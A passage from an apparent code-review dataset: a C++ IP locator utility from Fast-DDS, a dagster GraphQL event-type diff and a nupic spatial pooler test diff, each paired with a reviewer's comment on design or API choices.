std::stringstream ss(wan);
int a, b, c, d; //to store the 4 ints
char ch; //to temporarily store the '.'
if ( ss >> a >> ch >> b >> ch >> c >> ch >> d)
{
locator.address[8] = (octet)a;
locator.address[9] = (octet)b;
locator.address[10] = (octet)c;
locator.address[11] = (octet)d;
}
return true;
}
const octet* IPLocator::getWan(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[8]);
}
bool IPLocator::hasWan(
const Locator_t& locator)
{
return locator.kind == LOCATOR_KIND_TCPv4 && // TCPv6 doesn't use WAN
(locator.address[8] != 0 ||
locator.address[9] != 0 ||
locator.address[10] != 0 ||
locator.address[11] != 0);
}
std::string IPLocator::toWanstring(
const Locator_t& locator)
{
std::stringstream ss;
ss << (int)locator.address[8] << "."
<< (int)locator.address[9] << "."
<< (int)locator.address[10] << "."
<< (int)locator.address[11];
return ss.str();
}
bool IPLocator::setLanID(
Locator_t& locator,
const std::string& lanId)
{
if (locator.kind == LOCATOR_KIND_TCPv4)
{
std::stringstream ss(lanId);
int a, b, c, d, e, f, g, h; //to store the 8 ints
char ch; //to temporarily store the '.'
if ( ss >> a >> ch >> b >> ch >> c >> ch >> d >> ch >> e >> ch >> f >> ch >> g >> ch >> h)
{
locator.address[0] = (octet)a;
locator.address[1] = (octet)b;
locator.address[2] = (octet)c;
locator.address[3] = (octet)d;
locator.address[4] = (octet)e;
locator.address[5] = (octet)f;
locator.address[6] = (octet)g;
locator.address[7] = (octet)h;
return true;
}
}
return false;
}
const octet* IPLocator::getLanID(
const Locator_t& locator)
{
return static_cast<const octet*>(&locator.address[0]);
}
std::string IPLocator::toLanIDstring(
const Locator_t& locator)
{
if (locator.kind != LOCATOR_KIND_TCPv4)
{
return "";
}
std::stringstream ss;
ss << (int)locator.address[0] << "."
<< (int)locator.address[1] << "."
<< (int)locator.address[2] << "."
<< (int)locator.address[3] << "."
<< (int)locator.address[4] << "."
<< (int)locator.address[5] << "."
<< (int)locator.address[6] << "."
<< (int)locator.address[7];
return ss.str();
}
Locator_t IPLocator::toPhysicalLocator(
const Locator_t& locator)
{
Locator_t result = locator;
setLogicalPort(result, 0);
return result;
}
bool IPLocator::ip_equals_wan(
const Locator_t& locator)
{
return hasWan(locator) &&
locator.address[8] == locator.address[12] &&
locator.address[9] == locator.address[13] &&
locator.address[10] == locator.address[14] &&
locator.address[11] == locator.address[15];
}
// Common
bool IPLocator::setPortRTPS(
Locator_t& locator,
uint16_t port)
{
if (locator.kind == LOCATOR_KIND_UDPv4 || locator.kind == LOCATOR_KIND_UDPv6)
{
return setPhysicalPort(locator, port);
}
else if (locator.kind == LOCATOR_KIND_TCPv4 || locator.kind == LOCATOR_KIND_TCPv6)
{
return setLogicalPort(locator, port);
}
return false;
}
uint16_t IPLocator::getPortRTPS(
Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4 || locator.kind == LOCATOR_KIND_UDPv6)
{
return getPhysicalPort(locator);
}
else if (locator.kind == LOCATOR_KIND_TCPv4 || locator.kind == LOCATOR_KIND_TCPv6)
{
return getLogicalPort(locator);
}
return false;
}
bool IPLocator::isLocal(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4
|| locator.kind == LOCATOR_KIND_TCPv4)
{
return locator.address[12] == 127
&& locator.address[13] == 0
&& locator.address[14] == 0
&& locator.address[15] == 1;
}
else
{
return locator.address[0] == 0
&& locator.address[1] == 0
&& locator.address[2] == 0
&& locator.address[3] == 0
&& locator.address[4] == 0
&& locator.address[5] == 0
&& locator.address[6] == 0
&& locator.address[7] == 0
&& locator.address[8] == 0
&& locator.address[9] == 0
&& locator.address[10] == 0
&& locator.address[11] == 0
&& locator.address[12] == 0
&& locator.address[13] == 0
&& locator.address[14] == 0
&& locator.address[15] == 1;
}
}
bool IPLocator::isAny(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_UDPv4
|| locator.kind == LOCATOR_KIND_TCPv4)
{
return locator.address[12] == 0 &&
locator.address[13] == 0 &&
locator.address[14] == 0 &&
locator.address[15] == 0;
}
else
{
return locator.address[0] == 0 &&
locator.address[1] == 0 &&
locator.address[2] == 0 &&
locator.address[3] == 0 &&
locator.address[4] == 0 &&
locator.address[5] == 0 &&
locator.address[6] == 0 &&
locator.address[7] == 0 &&
locator.address[8] == 0 &&
locator.address[9] == 0 &&
locator.address[10] == 0 &&
locator.address[11] == 0 &&
locator.address[12] == 0 &&
locator.address[13] == 0 &&
locator.address[14] == 0 &&
locator.address[15] == 0;
}
}
bool IPLocator::compareAddress(
const Locator_t& loc1,
const Locator_t& loc2,
bool fullAddress)
{
if (loc1.kind != loc2.kind)
{
return false;
}
if (!fullAddress && (loc1.kind == LOCATOR_KIND_UDPv4 || loc1.kind == LOCATOR_KIND_TCPv4) )
{
return memcmp(&loc1.address[12], &loc2.address[12], 4) == 0;
}
else
{
return memcmp(loc1.address, loc2.address, 16) == 0;
}
}
bool IPLocator::compareAddressAndPhysicalPort(
const Locator_t& loc1,
const Locator_t& loc2)
{
return compareAddress(loc1, loc2, true) && getPhysicalPort(loc1) == getPhysicalPort(loc2);
}
std::string IPLocator::to_string(
const Locator_t& loc)
{
std::stringstream ss;
if (loc.kind == LOCATOR_KIND_UDPv4 || loc.kind == LOCATOR_KIND_TCPv4)
{
ss << (int)loc.address[8] << "."
<< (int)loc.address[9] << "."
<< (int)loc.address[10] << "."
<< (int)loc.address[11] << "@";
ss << (int)loc.address[12] << "." << (int)loc.address[13]
<< "." << (int)loc.address[14] << "." << (int)loc.address[15]
<< ":" << loc.port;
}
else if (loc.kind == LOCATOR_KIND_UDPv6 || loc.kind == LOCATOR_KIND_TCPv6)
{
for (uint8_t i = 0; i < 16; ++i)
{
ss << (int)loc.address[i];
if (i < 15)
{
ss << ".";
}
}
ss << ":" << loc.port;
}
return ss.str();
}
// UDP
bool IPLocator::isMulticast(
const Locator_t& locator)
{
if (locator.kind == LOCATOR_KIND_TCPv4
|| locator.kind == LOCATOR_KIND_TCPv6)
{
return false;
}
if (locator.kind == LOCATOR_KIND_UDPv4)
{
return locator.address[12] >= 224 &&
locator.address[12] <= 239;
}
else
{
return locator.address[0] == 0xFF;
}
}
} // namespace rtps
} // namespace fastrtps
} // namespace eprosima
| 1 | 20,604 | If we want to avoid the user calling constructor and destructor, we should add `= delete` to their declarations. If we just want to avoid writing the default behavior, we should add `= default` to the declarations. I'm more in favor of the second option to avoid an API break. | eProsima-Fast-DDS | cpp |
@@ -269,12 +269,12 @@ class GrapheneObjectStoreOperationResult(graphene.ObjectType):
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
-class GrapheneMaterialization(graphene.ObjectType):
+class GrapheneMaterializationOrObservation(graphene.ObjectType):
assetKey = graphene.Field(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
- name = "Materialization"
+ name = "MaterializationOrObservation"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries | 1 | import graphene
from dagster import check
from dagster.core.events import AssetLineageInfo, DagsterEventType
from dagster.core.execution.plan.objects import ErrorSource
from dagster.core.execution.stats import RunStepKeyStatsSnapshot
from ...implementation.fetch_runs import get_step_stats
from ..asset_key import GrapheneAssetKey, GrapheneAssetLineageInfo
from ..errors import GraphenePythonError
from ..runs import GrapheneStepEventStatus
from ..util import non_null_list
from .log_level import GrapheneLogLevel
class GrapheneMessageEvent(graphene.Interface):
runId = graphene.NonNull(graphene.String)
message = graphene.NonNull(graphene.String)
timestamp = graphene.NonNull(graphene.String)
level = graphene.NonNull(GrapheneLogLevel)
stepKey = graphene.Field(graphene.String)
solidHandleID = graphene.Field(graphene.String)
eventType = graphene.Field(graphene.Enum.from_enum(DagsterEventType))
class Meta:
name = "MessageEvent"
class GrapheneEventMetadataEntry(graphene.Interface):
label = graphene.NonNull(graphene.String)
description = graphene.String()
class Meta:
name = "EventMetadataEntry"
class GrapheneDisplayableEvent(graphene.Interface):
label = graphene.NonNull(graphene.String)
description = graphene.String()
metadataEntries = non_null_list(GrapheneEventMetadataEntry)
class Meta:
name = "DisplayableEvent"
class GrapheneMissingRunIdErrorEvent(graphene.ObjectType):
invalidRunId = graphene.NonNull(graphene.String)
class Meta:
name = "MissingRunIdErrorEvent"
class GrapheneLogMessageEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent,)
name = "LogMessageEvent"
class GrapheneRunEvent(graphene.Interface):
pipelineName = graphene.NonNull(graphene.String)
class Meta:
name = "RunEvent"
class GrapheneRunEnqueuedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunEnqueuedEvent"
class GrapheneRunDequeuedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunDequeuedEvent"
class GrapheneRunStartingEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunStartingEvent"
class GrapheneRunCancelingEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunCancelingEvent"
class GrapheneRunCanceledEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunCanceledEvent"
class GrapheneRunStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunStartEvent"
class GrapheneRunSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunSuccessEvent"
class GrapheneRunFailureEvent(graphene.ObjectType):
error = graphene.Field(GraphenePythonError)
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "RunFailureEvent"
class GrapheneAlertStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "AlertStartEvent"
class GrapheneAlertSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneRunEvent)
name = "AlertSuccessEvent"
class GrapheneStepEvent(graphene.Interface):
stepKey = graphene.Field(graphene.String)
solidHandleID = graphene.Field(graphene.String)
class Meta:
name = "StepEvent"
class GrapheneExecutionStepStartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepStartEvent"
class GrapheneExecutionStepRestartEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepRestartEvent"
class GrapheneExecutionStepUpForRetryEvent(graphene.ObjectType):
error = graphene.Field(GraphenePythonError)
secondsToWait = graphene.Field(graphene.Int)
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepUpForRetryEvent"
class GrapheneExecutionStepSkippedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepSkippedEvent"
class GrapheneEventPathMetadataEntry(graphene.ObjectType):
path = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPathMetadataEntry"
class GrapheneEventJsonMetadataEntry(graphene.ObjectType):
jsonString = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventJsonMetadataEntry"
class GrapheneEventTextMetadataEntry(graphene.ObjectType):
text = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventTextMetadataEntry"
class GrapheneEventUrlMetadataEntry(graphene.ObjectType):
url = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventUrlMetadataEntry"
class GrapheneEventMarkdownMetadataEntry(graphene.ObjectType):
md_str = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventMarkdownMetadataEntry"
class GrapheneEventPythonArtifactMetadataEntry(graphene.ObjectType):
module = graphene.NonNull(graphene.String)
name = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPythonArtifactMetadataEntry"
class GrapheneEventFloatMetadataEntry(graphene.ObjectType):
floatValue = graphene.Field(graphene.Float)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventFloatMetadataEntry"
class GrapheneEventIntMetadataEntry(graphene.ObjectType):
intValue = graphene.Field(
graphene.Int, description="Nullable to allow graceful degrade on > 32 bit numbers"
)
intRepr = graphene.NonNull(
graphene.String,
description="String representation of the int to support greater than 32 bit",
)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventIntMetadataEntry"
class GrapheneEventPipelineRunMetadataEntry(graphene.ObjectType):
runId = graphene.NonNull(graphene.String)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventPipelineRunMetadataEntry"
class GrapheneEventAssetMetadataEntry(graphene.ObjectType):
assetKey = graphene.NonNull(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneEventMetadataEntry,)
name = "EventAssetMetadataEntry"
class GrapheneObjectStoreOperationType(graphene.Enum):
SET_OBJECT = "SET_OBJECT"
GET_OBJECT = "GET_OBJECT"
RM_OBJECT = "RM_OBJECT"
CP_OBJECT = "CP_OBJECT"
class Meta:
name = "ObjectStoreOperationType"
class GrapheneObjectStoreOperationResult(graphene.ObjectType):
op = graphene.NonNull(GrapheneObjectStoreOperationType)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "ObjectStoreOperationResult"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneMaterialization(graphene.ObjectType):
assetKey = graphene.Field(GrapheneAssetKey)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "Materialization"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
def resolve_assetKey(self, _graphene_info):
asset_key = self.asset_key # pylint: disable=no-member
if not asset_key:
return None
return GrapheneAssetKey(path=asset_key.path)
class GrapheneExpectationResult(graphene.ObjectType):
success = graphene.NonNull(graphene.Boolean)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "ExpectationResult"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneTypeCheck(graphene.ObjectType):
success = graphene.NonNull(graphene.Boolean)
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "TypeCheck"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneFailureMetadata(graphene.ObjectType):
class Meta:
interfaces = (GrapheneDisplayableEvent,)
name = "FailureMetadata"
def resolve_metadataEntries(self, _graphene_info):
from ...implementation.events import _to_metadata_entries
return _to_metadata_entries(self.metadata_entries) # pylint: disable=no-member
class GrapheneExecutionStepInputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepInputEvent"
input_name = graphene.NonNull(graphene.String)
type_check = graphene.NonNull(GrapheneTypeCheck)
class GrapheneExecutionStepOutputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent, GrapheneDisplayableEvent)
name = "ExecutionStepOutputEvent"
output_name = graphene.NonNull(graphene.String)
type_check = graphene.NonNull(GrapheneTypeCheck)
class GrapheneExecutionStepSuccessEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepSuccessEvent"
class GrapheneExecutionStepFailureEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ExecutionStepFailureEvent"
error = graphene.Field(GraphenePythonError)
errorSource = graphene.Field(graphene.Enum.from_enum(ErrorSource))
failureMetadata = graphene.Field(GrapheneFailureMetadata)
class GrapheneHookCompletedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookCompletedEvent"
class GrapheneHookSkippedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookSkippedEvent"
class GrapheneHookErroredEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "HookErroredEvent"
error = graphene.Field(GraphenePythonError)
class GrapheneLogsCapturedEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent,)
name = "LogsCapturedEvent"
logKey = graphene.NonNull(graphene.String)
stepKeys = graphene.List(graphene.NonNull(graphene.String))
pid = graphene.Int()
class GrapheneStepMaterializationEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "StepMaterializationEvent"
materialization = graphene.NonNull(GrapheneMaterialization)
stepStats = graphene.NonNull(lambda: GrapheneRunStepStats)
assetLineage = non_null_list(GrapheneAssetLineageInfo)
def __init__(self, materialization, assetLineage, **basic_params):
self._asset_lineage = check.opt_list_param(assetLineage, "assetLineage", AssetLineageInfo)
super().__init__(materialization=materialization, **basic_params)
def resolve_stepStats(self, graphene_info):
run_id = self.runId # pylint: disable=no-member
step_key = self.stepKey # pylint: disable=no-member
stats = get_step_stats(graphene_info, run_id, step_keys=[step_key])
return stats[0]
def resolve_assetLineage(self, _graphene_info):
return [
GrapheneAssetLineageInfo(
assetKey=lineage_info.asset_key,
partitions=lineage_info.partitions,
)
for lineage_info in self._asset_lineage
]
class GrapheneHandledOutputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent, GrapheneDisplayableEvent)
name = "HandledOutputEvent"
output_name = graphene.NonNull(graphene.String)
manager_key = graphene.NonNull(graphene.String)
class GrapheneLoadedInputEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "LoadedInputEvent"
input_name = graphene.NonNull(graphene.String)
manager_key = graphene.NonNull(graphene.String)
upstream_output_name = graphene.Field(graphene.String)
upstream_step_key = graphene.Field(graphene.String)
class GrapheneObjectStoreOperationEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "ObjectStoreOperationEvent"
operation_result = graphene.NonNull(GrapheneObjectStoreOperationResult)
class GrapheneEngineEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneDisplayableEvent, GrapheneStepEvent)
name = "EngineEvent"
error = graphene.Field(GraphenePythonError)
marker_start = graphene.Field(graphene.String)
marker_end = graphene.Field(graphene.String)
class GrapheneStepExpectationResultEvent(graphene.ObjectType):
class Meta:
interfaces = (GrapheneMessageEvent, GrapheneStepEvent)
name = "StepExpectationResultEvent"
expectation_result = graphene.NonNull(GrapheneExpectationResult)
# Should be a union of all possible events
class GrapheneDagsterRunEvent(graphene.Union):
class Meta:
types = (
GrapheneExecutionStepFailureEvent,
GrapheneExecutionStepInputEvent,
GrapheneExecutionStepOutputEvent,
GrapheneExecutionStepSkippedEvent,
GrapheneExecutionStepStartEvent,
GrapheneExecutionStepSuccessEvent,
GrapheneExecutionStepUpForRetryEvent,
GrapheneExecutionStepRestartEvent,
GrapheneLogMessageEvent,
GrapheneRunFailureEvent,
GrapheneRunStartEvent,
GrapheneRunEnqueuedEvent,
GrapheneRunDequeuedEvent,
GrapheneRunStartingEvent,
GrapheneRunCancelingEvent,
GrapheneRunCanceledEvent,
GrapheneRunSuccessEvent,
GrapheneHandledOutputEvent,
GrapheneLoadedInputEvent,
GrapheneLogsCapturedEvent,
GrapheneObjectStoreOperationEvent,
GrapheneStepExpectationResultEvent,
GrapheneStepMaterializationEvent,
GrapheneEngineEvent,
GrapheneHookCompletedEvent,
GrapheneHookSkippedEvent,
GrapheneHookErroredEvent,
GrapheneAlertStartEvent,
GrapheneAlertSuccessEvent,
)
name = "DagsterRunEvent"
class GraphenePipelineRunStepStats(graphene.Interface):
runId = graphene.NonNull(graphene.String)
stepKey = graphene.NonNull(graphene.String)
status = graphene.Field(GrapheneStepEventStatus)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
materializations = non_null_list(GrapheneMaterialization)
expectationResults = non_null_list(GrapheneExpectationResult)
class Meta:
name = "PipelineRunStepStats"
class GrapheneRunMarker(graphene.ObjectType):
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
class Meta:
name = "RunMarker"
class GrapheneRunStepStats(graphene.ObjectType):
runId = graphene.NonNull(graphene.String)
stepKey = graphene.NonNull(graphene.String)
status = graphene.Field(GrapheneStepEventStatus)
startTime = graphene.Field(graphene.Float)
endTime = graphene.Field(graphene.Float)
materializations = non_null_list(GrapheneMaterialization)
expectationResults = non_null_list(GrapheneExpectationResult)
attempts = non_null_list(GrapheneRunMarker)
markers = non_null_list(GrapheneRunMarker)
class Meta:
interfaces = (GraphenePipelineRunStepStats,)
name = "RunStepStats"
def __init__(self, stats):
self._stats = check.inst_param(stats, "stats", RunStepKeyStatsSnapshot)
super().__init__(
runId=stats.run_id,
stepKey=stats.step_key,
status=stats.status,
startTime=stats.start_time,
endTime=stats.end_time,
materializations=stats.materializations,
expectationResults=stats.expectation_results,
attempts=[
GrapheneRunMarker(startTime=attempt.start_time, endTime=attempt.end_time)
for attempt in stats.attempts_list
],
markers=[
GrapheneRunMarker(startTime=marker.start_time, endTime=marker.end_time)
for marker in stats.markers
],
)
| 1 | 18,601 | My preference here is to keep a stricter hierarchy. We should have a mixin or something that is an AssetEvent that Observation and Materialization can both inherit from. That way we can check the type in the frontend if we need to. | dagster-io-dagster | py |
@@ -212,7 +212,7 @@ class SpatialPoolerTest(unittest.TestCase):
# Get only the active column indices
spOutput = [i for i, v in enumerate(activeArray) if v != 0]
- self.assertEqual(spOutput, expectedOutput)
+ self.assertEqual(sorted(spOutput), expectedOutput)
def testStripNeverLearned(self): | 1 | #! /usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
# Disable since test code accesses private members in the class to be tested
# pylint: disable=W0212
import numbers
import tempfile
import unittest
from copy import copy
from mock import Mock
import numpy
from nupic.support.unittesthelpers.algorithm_test_helpers import (
getNumpyRandomGenerator, getSeed)
from nupic.bindings.math import GetNTAReal, Random
from nupic.research.spatial_pooler import (BinaryCorticalColumns,
CorticalColumns,
SpatialPooler)
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.proto import SpatialPoolerProto_capnp
uintDType = "uint32"
realDType = GetNTAReal()
class SpatialPoolerTest(unittest.TestCase):
"""Unit Tests for SpatialPooler class."""
def setUp(self):
self._params = {
"inputDimensions": [5],
"columnDimensions": [5],
"potentialRadius": 5,
"potentialPct": 0.5,
"globalInhibition": False,
"localAreaDensity": -1.0,
"numActiveColumnsPerInhArea": 3,
"stimulusThreshold": 0,
"synPermInactiveDec": 0.01,
"synPermActiveInc": 0.1,
"synPermConnected": 0.10,
"minPctOverlapDutyCycle": 0.1,
"minPctActiveDutyCycle": 0.1,
"dutyCyclePeriod": 10,
"maxBoost": 10.0,
"seed": getSeed(),
"spVerbosity": 0
}
self._sp = SpatialPooler(**self._params)
def testCompute1(self):
"""Checks that feeding in the same input vector leads to polarized
permanence values: either zeros or ones, but no fractions"""
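    # Every column is forced active on each step (inhibition is mocked to
    # return all columns), so repeatedly presenting the same input should drive
    # the permanences on active input bits up to the maximum and those on
    # inactive bits down to zero, which is why each row ends up equal to the
    # input vector.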
sp = SpatialPooler(
inputDimensions=[9],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.1,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=getSeed(),
spVerbosity=0)
sp._potentialPools = BinaryCorticalColumns(numpy.ones([sp._numColumns,
sp._numInputs]))
sp._inhibitColumns = Mock(return_value = numpy.array(range(5)))
inputVector = numpy.array([1, 0, 1, 0, 1, 0, 0, 1, 1])
activeArray = numpy.zeros(5)
for i in xrange(20):
sp.compute(inputVector, True, activeArray)
for i in xrange(sp._numColumns):
perm = sp._permanences.getRow(i)
self.assertEqual(list(perm), list(inputVector))
def testCompute2(self):
"""Checks that columns only change the permanence values for
inputs that are within their potential pool"""
sp = SpatialPooler(
inputDimensions=[10],
columnDimensions=[5],
potentialRadius=3,
potentialPct=0.5,
globalInhibition=False,
localAreaDensity=-1.0,
numActiveColumnsPerInhArea=3,
stimulusThreshold=1,
synPermInactiveDec=0.01,
synPermActiveInc=0.1,
synPermConnected=0.10,
minPctOverlapDutyCycle=0.1,
minPctActiveDutyCycle=0.1,
dutyCyclePeriod=10,
maxBoost=10.0,
seed=getSeed(),
spVerbosity=0)
sp._inhibitColumns = Mock(return_value = numpy.array(range(5)))
inputVector = numpy.ones(sp._numInputs)
activeArray = numpy.zeros(5)
for i in xrange(20):
sp.compute(inputVector, True, activeArray)
for columnIndex in xrange(sp._numColumns):
potential = sp._potentialPools[columnIndex]
perm = sp._permanences.getRow(columnIndex)
self.assertEqual(list(perm), list(potential))
def testExactOutput(self):
"""
Given a specific input and initialization params the SP should return this
exact output.
Previously output varied between platforms (OSX/Linux etc)
"""
expectedOutput = [57, 80, 135, 215, 280, 281, 350, 431, 534, 556, 565, 574,
595, 663, 759, 777, 823, 932, 933, 968, 983, 1031, 1126,
1184, 1232, 1262, 1420, 1468, 1479, 1516, 1531, 1585,
1655, 1672, 1755, 1906, 1927, 1936, 1939, 1940]
sp = SpatialPooler(
inputDimensions = [1,188],
columnDimensions = [2048, 1],
potentialRadius = 94,
potentialPct = 0.5,
globalInhibition = 1,
localAreaDensity = -1.0,
numActiveColumnsPerInhArea = 40.0,
stimulusThreshold = 0,
synPermInactiveDec = 0.01,
synPermActiveInc = 0.1,
synPermConnected = 0.1,
minPctOverlapDutyCycle=0.001,
minPctActiveDutyCycle=0.001,
dutyCyclePeriod = 1000,
maxBoost = 10.0,
seed = 1956,
spVerbosity = 0
)
inputVector = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
inputArray = numpy.array(inputVector).astype(realDType)
activeArray = numpy.zeros(2048)
sp.compute(inputArray, 1, activeArray)
# Get only the active column indices
spOutput = [i for i, v in enumerate(activeArray) if v != 0]
self.assertEqual(spOutput, expectedOutput)
def testStripNeverLearned(self):
sp = self._sp
sp._activeDutyCycles = numpy.array([0.5, 0.1, 0, 0.2, 0.4, 0])
activeArray = numpy.array([1, 1, 1, 0, 1, 0])
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = [0, 1, 4]
self.assertListEqual(trueStripped, list(stripped))
sp._activeDutyCycles = numpy.array([0.9, 0, 0, 0, 0.4, 0.3])
activeArray = numpy.ones(6)
sp.stripUnlearnedColumns(activeArray)
stripped = numpy.where(activeArray == 1)[0]
trueStripped = [0, 4, 5]
self.assertListEqual(trueStripped, list(stripped))
